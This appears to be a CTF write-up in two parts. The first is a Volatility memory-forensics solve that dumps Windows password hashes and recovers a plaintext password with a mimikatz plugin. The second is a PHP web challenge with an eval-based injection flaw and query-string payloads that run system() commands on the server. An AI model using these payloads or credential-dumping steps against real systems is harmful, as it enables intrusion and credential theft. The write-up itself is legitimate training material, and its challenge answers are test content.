155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
❯ volatility -f 内存取证.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/chenyi/Downloads/das10/卡比卡比卡比 /内存取证.raw)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf8000403c0a0L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff8000403dd00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2021-10-14 15:23:41 UTC+0000
Image local date and time : 2021-10-14 23:23:41 +0800
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.6
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xfffffa80024d0ae0 System 4 0 90 588 ------ 0 2021-01-29 15:43:48 UTC+0000
0xfffffa8002d6c820 smss.exe 244 4 3 29 ------ 0 2021-01-29 15:43:48 UTC+0000
0xfffffa800360b060 csrss.exe 332 320 9 539 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa8003791710 wininit.exe 384 320 3 77 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa800382e530 services.exe 484 384 8 214 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa800383cb30 lsass.exe 500 384 7 748 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa8003840b30 lsm.exe 508 384 11 141 0 0 2021-01-29 15:43:49 UTC+0000
0xfffffa80038cd670 svchost.exe 616 484 11 359 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa80038f4060 vmacthlp.exe 676 484 3 53 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa8003905b30 svchost.exe 720 484 8 308 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa800393c890 svchost.exe 796 484 23 599 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa8003975890 svchost.exe 856 484 24 472 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa800399f750 svchost.exe 884 484 30 953 0 0 2021-01-29 15:43:50 UTC+0000
0xfffffa8003a1f5f0 svchost.exe 272 484 17 716 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003a6fb30 svchost.exe 788 484 17 480 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003acc220 spoolsv.exe 1156 484 13 272 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003aea830 svchost.exe 1184 484 19 308 0 0 2021-01-29 15:43:51 UTC+0000
0xfffffa8003b7a060 svchost.exe 1280 484 23 314 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003bddb30 VGAuthService. 1340 484 3 86 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003c4c060 vmtoolsd.exe 1456 484 9 267 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003d3bb30 svchost.exe 1632 484 6 93 0 0 2021-01-29 15:43:52 UTC+0000
0xfffffa8003d3e2f0 dllhost.exe 1832 484 13 185 0 0 2021-01-29 15:43:53 UTC+0000
0xfffffa80037ad960 msdtc.exe 1944 484 12 144 0 0 2021-01-29 15:43:53 UTC+0000
0xfffffa8003d6cb30 WmiPrvSE.exe 1332 616 10 202 0 0 2021-01-29 15:43:54 UTC+0000
0xfffffa800402f060 SearchIndexer. 2788 484 13 780 0 0 2021-01-29 15:45:26 UTC+0000
0xfffffa8003d9fb30 wmpnetwk.exe 2916 484 17 468 0 0 2021-01-29 15:45:26 UTC+0000
0xfffffa800416f060 svchost.exe 1444 484 5 270 0 0 2021-01-29 15:45:27 UTC+0000
0xfffffa8003f25b30 sppsvc.exe 1404 484 6 151 0 0 2021-01-29 15:45:52 UTC+0000
0xfffffa800406eb30 svchost.exe 2892 484 14 321 0 0 2021-01-29 15:45:53 UTC+0000
0xfffffa80037f8920 csrss.exe 2648 3880 9 356 2 0 2021-10-14 14:22:27 UTC+0000
0xfffffa8004136060 winlogon.exe 2972 3880 5 116 2 0 2021-10-14 14:22:27 UTC+0000
0xfffffa8003c743f0 taskhost.exe 3760 484 9 230 2 0 2021-10-14 14:22:43 UTC+0000
0xfffffa8004333b30 dwm.exe 2824 856 5 297 2 0 2021-10-14 14:22:45 UTC+0000
0xfffffa800397d530 explorer.exe 3928 3800 79 1908 2 0 2021-10-14 14:22:45 UTC+0000
0xfffffa8003f9e530 vmtoolsd.exe 3952 3928 8 196 2 0 2021-10-14 14:22:46 UTC+0000
0xfffffa8002b86b30 iexplore.exe 2136 3928 18 676 2 1 2021-10-14 14:26:53 UTC+0000
0xfffffa8002adc940 iexplore.exe 1672 2136 18 603 2 1 2021-10-14 14:26:53 UTC+0000
0xfffffa80042adb30 iexplore.exe 2360 2136 18 440 2 1 2021-10-14 14:27:48 UTC+0000
0xfffffa8004106b30 cmd.exe 3560 3928 1 19 2 0 2021-10-14 14:42:29 UTC+0000
0xfffffa800423f950 conhost.exe 3224 2648 2 58 2 0 2021-10-14 14:42:29 UTC+0000
0xfffffa8003f32060 audiodg.exe 3892 796 6 136 0 0 2021-10-14 15:16:26 UTC+0000
0xfffffa80039a2b30 dllhost.exe 3540 616 17 233 2 0 2021-10-14 15:20:04 UTC+0000
0xfffffa8003d79b30 dllhost.exe 2964 616 6 85 2 0 2021-10-14 15:23:41 UTC+0000
0xfffffa8003fe18a0 dllhost.exe 2752 616 6 82 0 0 2021-10-14 15:23:41 UTC+0000
0xfffffa80037ae950 DumpIt.exe 3700 3928 1 25 2 1 2021-10-14 15:23:41 UTC+0000
0xfffffa8003e9e7d0 conhost.exe 3860 2648 2 58 2 0 2021-10-14 15:23:41 UTC+0000
0xfffffa80042c2b30 dllhost.exe 3752 616 6 91 ------ 0 2021-10-14 15:23:42 UTC+0000
0xfffffa8004e23990 VMwareResoluti 3544 1456 1 416...81 2 0 2021-10-14 15:23:43 UTC+0000
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0xfffffa8003791710:wininit.exe 384 320 3 77 2021-01-29 15:43:49 UTC+0000
. 0xfffffa800383cb30:lsass.exe 500 384 7 748 2021-01-29 15:43:49 UTC+0000
. 0xfffffa800382e530:services.exe 484 384 8 214 2021-01-29 15:43:49 UTC+0000
.. 0xfffffa8003b7a060:svchost.exe 1280 484 23 314 2021-01-29 15:43:52 UTC+0000
.. 0xfffffa8003acc220:spoolsv.exe 1156 484 13 272 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa8003d9fb30:wmpnetwk.exe 2916 484 17 468 2021-01-29 15:45:26 UTC+0000
.. 0xfffffa8003a1f5f0:svchost.exe 272 484 17 716 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa8003a6fb30:svchost.exe 788 484 17 480 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa80037ad960:msdtc.exe 1944 484 12 144 2021-01-29 15:43:53 UTC+0000
.. 0xfffffa800393c890:svchost.exe 796 484 23 599 2021-01-29 15:43:50 UTC+0000
... 0xfffffa8003f32060:audiodg.exe 3892 796 6 136 2021-10-14 15:16:26 UTC+0000
.. 0xfffffa800399f750:svchost.exe 884 484 30 953 2021-01-29 15:43:50 UTC+0000
.. 0xfffffa8003aea830:svchost.exe 1184 484 19 308 2021-01-29 15:43:51 UTC+0000
.. 0xfffffa8003c743f0:taskhost.exe 3760 484 9 230 2021-10-14 14:22:43 UTC+0000
.. 0xfffffa80038f4060:vmacthlp.exe 676 484 3 53 2021-01-29 15:43:50 UTC+0000
.. 0xfffffa8003d3e2f0:dllhost.exe 1832 484 13 185 2021-01-29 15:43:53 UTC+0000
.. 0xfffffa8003c4c060:vmtoolsd.exe 1456 484 9 267 2021-01-29 15:43:52 UTC+0000
... 0xfffffa8004e23990:VMwareResoluti 3544 1456 1 41...1 2021-10-14 15:23:43 UTC+0000
.. 0xfffffa8003bddb30:VGAuthService. 1340 484 3 86 2021-01-29 15:43:52 UTC+0000
.. 0xfffffa800406eb30:svchost.exe 2892 484 14 321 2021-01-29 15:45:53 UTC+0000
.. 0xfffffa8003905b30:svchost.exe 720 484 8 308 2021-01-29 15:43:50 UTC+0000
.. 0xfffffa8003975890:svchost.exe 856 484 24 472 2021-01-29 15:43:50 UTC+0000
... 0xfffffa8004333b30:dwm.exe 2824 856 5 297 2021-10-14 14:22:45 UTC+0000
.. 0xfffffa800402f060:SearchIndexer. 2788 484 13 780 2021-01-29 15:45:26 UTC+0000
.. 0xfffffa8003d3bb30:svchost.exe 1632 484 6 93 2021-01-29 15:43:52 UTC+0000
.. 0xfffffa80038cd670:svchost.exe 616 484 11 359 2021-01-29 15:43:50 UTC+0000
... 0xfffffa80042c2b30:dllhost.exe 3752 616 6 91 2021-10-14 15:23:42 UTC+0000
... 0xfffffa8003d6cb30:WmiPrvSE.exe 1332 616 10 202 2021-01-29 15:43:54 UTC+0000
... 0xfffffa8003fe18a0:dllhost.exe 2752 616 6 82 2021-10-14 15:23:41 UTC+0000
... 0xfffffa80039a2b30:dllhost.exe 3540 616 17 233 2021-10-14 15:20:04 UTC+0000
... 0xfffffa8003d79b30:dllhost.exe 2964 616 6 85 2021-10-14 15:23:41 UTC+0000
.. 0xfffffa8003f25b30:sppsvc.exe 1404 484 6 151 2021-01-29 15:45:52 UTC+0000
.. 0xfffffa800416f060:svchost.exe 1444 484 5 270 2021-01-29 15:45:27 UTC+0000
. 0xfffffa8003840b30:lsm.exe 508 384 11 141 2021-01-29 15:43:49 UTC+0000
0xfffffa800360b060:csrss.exe 332 320 9 539 2021-01-29 15:43:49 UTC+0000
0xfffffa80037f8920:csrss.exe 2648 3880 9 356 2021-10-14 14:22:27 UTC+0000
. 0xfffffa800423f950:conhost.exe 3224 2648 2 58 2021-10-14 14:42:29 UTC+0000
. 0xfffffa8003e9e7d0:conhost.exe 3860 2648 2 58 2021-10-14 15:23:41 UTC+0000
0xfffffa8004136060:winlogon.exe 2972 3880 5 116 2021-10-14 14:22:27 UTC+0000
0xfffffa80024d0ae0:System 4 0 90 588 2021-01-29 15:43:48 UTC+0000
. 0xfffffa8002d6c820:smss.exe 244 4 3 29 2021-01-29 15:43:48 UTC+0000
0xfffffa800397d530:explorer.exe 3928 3800 79 1908 2021-10-14 14:22:45 UTC+0000
. 0xfffffa80037ae950:DumpIt.exe 3700 3928 1 25 2021-10-14 15:23:41 UTC+0000
. 0xfffffa8003f9e530:vmtoolsd.exe 3952 3928 8 196 2021-10-14 14:22:46 UTC+0000
. 0xfffffa8004106b30:cmd.exe 3560 3928 1 19 2021-10-14 14:42:29 UTC+0000
. 0xfffffa8002b86b30:iexplore.exe 2136 3928 18 676 2021-10-14 14:26:53 UTC+0000
.. 0xfffffa8002adc940:iexplore.exe 1672 2136 18 603 2021-10-14 14:26:53 UTC+0000
.. 0xfffffa80042adb30:iexplore.exe 2360 2136 18 440 2021-10-14 14:27:48 UTC+0000
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 psscan
Volatility Foundation Volatility Framework 2.6
Offset(P) Name PID PPID PDB Time created Time exited
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000003cc2a990 VMwareResoluti 3544 1456 0x000000003ca08000 2021-10-14 15:23:43 UTC+0000
0x000000003e03f950 conhost.exe 3224 2648 0x0000000001ce7000 2021-10-14 14:42:29 UTC+0000
0x000000003e06db30 SearchFilterHo 328 2788 0x0000000019a93000 2021-10-14 15:07:27 UTC+0000 2021-10-14 15:08:34 UTC+0000
0x000000003e0adb30 iexplore.exe 2360 2136 0x000000002cb9c000 2021-10-14 14:27:48 UTC+0000
0x000000003e0c2b30 dllhost.exe 3752 616 0x00000000220c3000 2021-10-14 15:23:42 UTC+0000
0x000000003e133b30 dwm.exe 2824 856 0x0000000000c9e000 2021-10-14 14:22:45 UTC+0000
0x000000003e22f060 SearchIndexer. 2788 484 0x0000000002265000 2021-01-29 15:45:26 UTC+0000
0x000000003e26eb30 svchost.exe 2892 484 0x000000002daa9000 2021-01-29 15:45:53 UTC+0000
0x000000003e306b30 cmd.exe 3560 3928 0x000000002f90e000 2021-10-14 14:42:29 UTC+0000
0x000000003e336060 winlogon.exe 2972 3880 0x000000000546e000 2021-10-14 14:22:27 UTC+0000
0x000000003e36f060 svchost.exe 1444 484 0x000000003a216000 2021-01-29 15:45:27 UTC+0000
0x000000003e49e7d0 conhost.exe 3860 2648 0x000000003d0fe000 2021-10-14 15:23:41 UTC+0000
0x000000003e525b30 sppsvc.exe 1404 484 0x000000002c561000 2021-01-29 15:45:52 UTC+0000
0x000000003e532060 audiodg.exe 3892 796 0x0000000034578000 2021-10-14 15:16:26 UTC+0000
0x000000003e59e530 vmtoolsd.exe 3952 3928 0x000000002aba7000 2021-10-14 14:22:46 UTC+0000
0x000000003e5e18a0 dllhost.exe 2752 616 0x000000003dad8000 2021-10-14 15:23:41 UTC+0000
0x000000003e64c060 vmtoolsd.exe 1456 484 0x0000000007aa7000 2021-01-29 15:43:52 UTC+0000
0x000000003e6743f0 taskhost.exe 3760 484 0x000000003256d000 2021-10-14 14:22:43 UTC+0000
0x000000003e73bb30 svchost.exe 1632 484 0x0000000000ec6000 2021-01-29 15:43:52 UTC+0000
0x000000003e73e2f0 dllhost.exe 1832 484 0x000000003b954000 2021-01-29 15:43:53 UTC+0000
0x000000003e76cb30 WmiPrvSE.exe 1332 616 0x0000000033d5d000 2021-01-29 15:43:54 UTC+0000
0x000000003e779b30 dllhost.exe 2964 616 0x0000000028274000 2021-10-14 15:23:41 UTC+0000
0x000000003e79fb30 wmpnetwk.exe 2916 484 0x000000003ae0b000 2021-01-29 15:45:26 UTC+0000
0x000000003e81f5f0 svchost.exe 272 484 0x000000000f2e1000 2021-01-29 15:43:51 UTC+0000
0x000000003e86fb30 svchost.exe 788 484 0x000000000ab6e000 2021-01-29 15:43:51 UTC+0000
0x000000003e8cc220 spoolsv.exe 1156 484 0x00000000096cc000 2021-01-29 15:43:51 UTC+0000
0x000000003e8ea830 svchost.exe 1184 484 0x0000000009475000 2021-01-29 15:43:51 UTC+0000
0x000000003e97a060 svchost.exe 1280 484 0x000000000841b000 2021-01-29 15:43:52 UTC+0000
0x000000003e9ddb30 VGAuthService. 1340 484 0x0000000008121000 2021-01-29 15:43:52 UTC+0000
0x000000003ea2e530 services.exe 484 384 0x0000000013624000 2021-01-29 15:43:49 UTC+0000
0x000000003ea3cb30 lsass.exe 500 384 0x000000001344c000 2021-01-29 15:43:49 UTC+0000
0x000000003ea40b30 lsm.exe 508 384 0x0000000013414000 2021-01-29 15:43:49 UTC+0000
0x000000003eacd670 svchost.exe 616 484 0x0000000012a33000 2021-01-29 15:43:50 UTC+0000
0x000000003eaf4060 vmacthlp.exe 676 484 0x000000001272d000 2021-01-29 15:43:50 UTC+0000
0x000000003eb05b30 svchost.exe 720 484 0x0000000012735000 2021-01-29 15:43:50 UTC+0000
0x000000003eb3c890 svchost.exe 796 484 0x0000000012501000 2021-01-29 15:43:50 UTC+0000
0x000000003eb75890 svchost.exe 856 484 0x0000000011f4a000 2021-01-29 15:43:50 UTC+0000
0x000000003eb7d530 explorer.exe 3928 3800 0x0000000002fdf000 2021-10-14 14:22:45 UTC+0000
0x000000003eb9f750 svchost.exe 884 484 0x0000000011f53000 2021-01-29 15:43:50 UTC+0000
0x000000003eba2b30 dllhost.exe 3540 616 0x0000000024d2f000 2021-10-14 15:20:04 UTC+0000
0x000000003ebb23e0 dllhost.exe 2688 616 0x00000000302bf000 2021-10-14 15:23:30 UTC+0000 2021-10-14 15:23:39 UTC+0000
0x000000003ec0b060 csrss.exe 332 320 0x0000000016431000 2021-01-29 15:43:49 UTC+0000
0x000000003ed91710 wininit.exe 384 320 0x0000000015db7000 2021-01-29 15:43:49 UTC+0000
0x000000003edad960 msdtc.exe 1944 484 0x000000000389a000 2021-01-29 15:43:53 UTC+0000
0x000000003edae950 DumpIt.exe 3700 3928 0x000000003b639000 2021-10-14 15:23:41 UTC+0000
0x000000003edf8920 csrss.exe 2648 3880 0x000000001bc29000 2021-10-14 14:22:27 UTC+0000
0x000000003f76c820 smss.exe 244 4 0x000000001c79b000 2021-01-29 15:43:48 UTC+0000
0x000000003f8dc940 iexplore.exe 1672 2136 0x0000000036c6f000 2021-10-14 14:26:53 UTC+0000
0x000000003f940a10 SearchProtocol 2500 2788 0x0000000019895000 2021-10-14 15:20:42 UTC+0000 2021-10-14 15:21:46 UTC+0000
0x000000003f986b30 iexplore.exe 2136 3928 0x000000003a31d000 2021-10-14 14:26:53 UTC+0000
0x000000003ff0fae0 System 4 0 0x0000000000187000 2021-01-29 15:43:48 UTC+0000

#查看ie记录
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 3928 explorer.exe
Cache type "DEST" at 0x154869c9
Last modified: 2021-10-14 23:23:17 UTC+0000
Last accessed: 2021-10-14 15:23:18 UTC+0000
URL: qiyue@file:///C:/Program%20Files%20(x86)/MSBuild/key.png
**************************************************
Process: 3928 explorer.exe
Cache type "DEST" at 0x154869c9
Last modified: 2021-10-14 23:23:17 UTC+0000
Last accessed: 2021-10-14 15:23:18 UTC+0000
URL: qiyue@file:///C:/Program%20Files%20(x86)/MSBuild/key.png
**************************************************
Process: 1672 iexplore.exe
Cache type "DEST" at 0x5dc63c9
Last modified: 2021-10-14 22:35:42 UTC+0000
Last accessed: 2021-10-14 14:35:44 UTC+0000
URL: qiyue@http://cn.bing.com/search?q=%E5%9C%A8%E6%96%87%E4%BB%B6%E5%90%8D%E5%89%8D%E5%8A%A0%E4%B8%80%E4%B8%AA%E5%89%8D%E7%BC%80&form=PRCNZH&ocid=iehp&httpsmsn=1&msnews=1&refig=e629761cdada4269b19f274534c67bed
Title: (WeNTMRRN*NMR - VQHr Bing
**************************************************
Process: 1672 iexplore.exe
Cache type "DEST" at 0x5dcf5f9
Last modified: 2021-10-14 23:20:33 UTC+0000
Last accessed: 2021-10-14 15:20:34 UTC+0000
URL: qiyue@http://cn.bing.com/search?q=%E6%80%8E%E6%A0%B7%E8%AE%BE%E7%BD%AE%E6%96%87%E4%BB%B6%E5%90%8D%E8%83%BD%E5%A4%9F%E6%9B%B4%E5%AE%89%E5%85%A8%2C%E4%B8%8D%E8%A2%AB%E5%8F%91%E7%8E%B0&qs=ds&form=QBRE
Title: `7hneNTYf[hQ,NSs - VQHr Bing
**************************************************
Process: 1672 iexplore.exe
Cache type "DEST" at 0x75c4721
Last modified: 2021-10-14 23:17:25 UTC+0000
Last accessed: 2021-10-14 15:17:26 UTC+0000
URL: qiyue@http://cn.bing.com/search?q=%E6%80%8E%E6%A0%B7%E8%AE%BE%E7%BD%AE%E6%96%87%E4%BB%B6%E5%90%8D%E8%83%BD%E5%A4%9F%E6%9B%B4%E5%AE%89%E5%85%A

#得到提示
#URL: qiyue@http://cn.bing.com/search?q=在文件名前加一个前缀&form=PRCNZH&ocid=iehp&httpsmsn=1&msnews=1&refig=e629761cdada4269b19f274534c67bed
#URL: qiyue@http://cn.bing.com/search?q=怎样设置文件名能够更安全,不被发现&qs=ds&form=QBRE
#搜索key.png并提取

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 filescan | grep key.png
Volatility Foundation Volatility Framework 2.6
0x000000003e5e94c0 1 0 R--rwd \Device\HarddiskVolume2\Program Files (x86)\MSBuild\key.png
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e5e94c0 --dump-dir=./
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3e5e94c0 None \Device\HarddiskVolume2\Program Files (x86)\MSBuild\key.png
❯ cat file.None.0xfffffa800420e870.dat | iconv -f GBK -t UTF-8
我记得我存了一个非常棒的视频,但怎么找不到了,会不会在默认文件夹下。%

#根据提示搜索Video找到可以文件提取

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 filescan | grep Video
Volatility Foundation Volatility Framework 2.6
0x000000003e002070 2 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003e002b70 1 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003e0033d0 2 1 R--rwd \Device\HarddiskVolume2\Users\qiyue\Videos
0x000000003e003520 2 1 R--rwd \Device\HarddiskVolume2\Users\qiyue\Videos
0x000000003e248a90 1 0 R--r-- \Device\HarddiskVolume2\Users\Public\Videos\ohhhh
0x000000003e300070 2 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003e40de30 1 0 R--rwd \Device\HarddiskVolume2\Users\Public\Videos\desktop.ini
0x000000003e5a5b40 1 0 R--rwd \Device\HarddiskVolume2\Users\Public\Videos\Sample Videos\desktop.ini
0x000000003ebdfdc0 2 1 R--rwd \Device\HarddiskVolume2\Users\Public\Videos
0x000000003f94ebc0 1 0 R--rwd \Device\HarddiskVolume2\Users\qiyue\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e248a90 --dump-dir=./
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3e248a90 None \Device\HarddiskVolume2\Users\Public\Videos\ohhhh
❯ cat file.None.0xfffffa80039c1d60.dat
xzkbyyds!%

#查看cmd发现输入了5201314

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 cmdscan
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 3224
CommandHistory: 0xbfde0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 1 LastAdded: 0 LastDisplayed: 0
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0xac810: 5201314
Cmd #37 @ 0xb61c0:

Cmd #38 @ 0x40158:

**************************************************
CommandProcess: conhost.exe Pid: 3860
CommandHistory: 0xffde0 Application: DumpIt.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c

#搜索5201314提取得到zip文件

❯ volatility -f 内存取证.raw --profile=Win7SP1x64 filescan | grep 5201314
Volatility Foundation Volatility Framework 2.6
0x000000003e6e03c0 1 0 R--r-- \Device\HarddiskVolume2\Users\Public\Documents\5201314tips
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000003e6e03c0 --dump-dir=./
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3e6e03c0 None \Device\HarddiskVolume2\Users\Public\Documents\5201314tips
❯ file file.None.0xfffffa80038c54f0.dat
file.None.0xfffffa80038c54f0.dat: Zip archive data, at least v2.0 to extract
❯ cp file.None.0xfffffa80038c54f0.dat tips.zip

#ohhhh得key不是密码,找管理员密码,10961c67822ee59af54bdc9e91f2801f为hash值,无法爆破,python下的volatility使用Mimikatz插件可拿到密码MahouShoujoYyds。
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 printkey -K "SAM\Domains\Account\Users\Names"
Volatility Foundation Volatility Framework 2.6
Legend: (S) = Stable (V) = Volatile

----------------------------
Registry: \SystemRoot\System32\Config\SAM
Key name: Names (S)
Last updated: 2020-10-28 12:50:29 UTC+0000

Subkeys:
(S) Administrator
(S) Guest
(S) HomeGroupUser$
(S) qiyue

Values:
REG_DWORD : (S) 0
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
qiyue:1001:aad3b435b51404eeaad3b435b51404ee:10961c67822ee59af54bdc9e91f2801f:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:84f851a4a47f1a1c9408b7e1ab7b469e:::
❯ volatility -f 内存取证.raw --profile=Win7SP1x64 mimikatz
Volatility Foundation Volatility Framework 2.6
Module User Domain Password
-------- ---------------- ---------------- ----------------------------------------
wdigest qiyue qiyue-PC MahouShoujoYyds
wdigest QIYUE-PC$ WORKGROUP

#解密

Archive: tips.zip
inflating: exp
❯ cat exp
import struct
key = 'xxxxxxxxx'
fp = open('!@#$importance', 'rb')
fs = open('!@#$unimportance', 'wb')
data = fp.read()
for i in range(0, len(data)):
result = struct.pack('B', data[i] ^ ord(*key[i % len(key)]))
fs.write(result)
fp.close()
fs.close()

#利用xzkbyyds!作为key恢复文件得到gif文件

❯ cat s.py
import struct
key = 'xzkbyyds!'
fp = open('!@#$importance', 'wb')
fs = open('!@#$unimportance', 'rb')
data = fs.read()
for i in range(0, len(data)):
result = struct.pack('B', data[i] ^ ord(*key[i % len(key)]))
fp.write(result)
fp.close()
fs.close()
❯ python3 s.py
❯ file \!@\#\$importance
!@#$importance: GIF image data, version 89a, 119 x 103

对其修改其高度,在105帧处找到flag

1
DASCTF{Kirby_Yyds}

web

迷路的魔法少女

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
highlight_file('index.php');

extract($_GET);
error_reporting(0);
function String2Array($data)
{
if($data == '') return array();
@eval("\$array = $data;");
return $array;
}


if(is_array($attrid) && is_array($attrvalue))
{
$attrstr .= 'array(';
$attrids = count($attrid);
for($i=0; $i<$attrids; $i++)
{
$attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"';
if($i < $attrids-1)
{
$attrstr .= ',';
}
}
$attrstr .= ');';
}

String2Array($attrstr);

PHPMyWind最新版代码执行漏洞
payload

1
2
3
?attrid[0]=a&attrvalue[0]=")-system('ls /')-("
?attrid[0]=a&attrvalue[0]=")-system('cat /flag.sh')-("
?attrid[0]=a&attrvalue[0]=")-system('cat /etc/timezone')-("